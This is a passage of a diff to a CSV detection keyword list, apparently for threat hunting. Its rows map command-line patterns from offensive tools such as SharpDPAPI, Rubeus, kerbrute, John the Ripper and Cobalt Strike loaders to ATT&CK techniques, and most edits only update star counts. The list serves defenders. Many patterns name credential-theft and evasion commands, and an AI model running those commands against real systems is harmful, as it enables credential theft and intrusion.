T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* bleeding-jumbo john*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "* blindeventlog.exe*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" -"* blob /target:*.bin* /pvk:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"* blob /target:*.bin* /unprotect*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* blob /target:*.bin* /pvk:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* blob /target:*.bin* /unprotect*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" "* --blockDLLs --ruy-lopez*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","1","N/A","N/A","N/A","N/A" -"* --bloodhound --ns ip --collection All*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* bof_allocator *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" -"* bof_reuse_memory *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"* --bloodhound --ns ip --collection All*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* bof_allocator *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"* bof_reuse_memory *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "* -BOFBytes *","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "* BOFNET *","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "* BofRunner(*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" -"* -bootkey *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -bootkey *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* Brc4LdapSentinelParser*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" "* broadcast-ataoe-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-avahi-dos.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -226,11 +226,11 @@ "* broadcast-wsdd-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-xdmcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* bropper.py*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" -"* brute * /password*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* BruteForce(*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"* brute * /password*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* BruteForce(*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" "* --brute-ratel*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" -"* Brutesploit*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","0","N/A","N/A","7","665","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" -"* bruteuser *","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"* Brutesploit*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","0","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"* bruteuser *","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" "* build Dent.go*","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","0","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "* -Build -NoAttackPaths*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" "* build_letmeout*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","0","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" @@ -240,14 +240,14 @@ "* BypassUac*.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "* -c * --choose-mutators * -s 1*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "* -c * -o payload.ser*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" -"* -c *ExploitClass.cs*System.dll*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -c *ExploitClass.cs*System.dll*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "* -c *OBFUSCATION=*.ps1*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "* -c '/accepteula /s calc.exe' -e PsExec64.exe*","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","0","N/A","N/A","3","248","38","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" "* -c active_users -u *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or 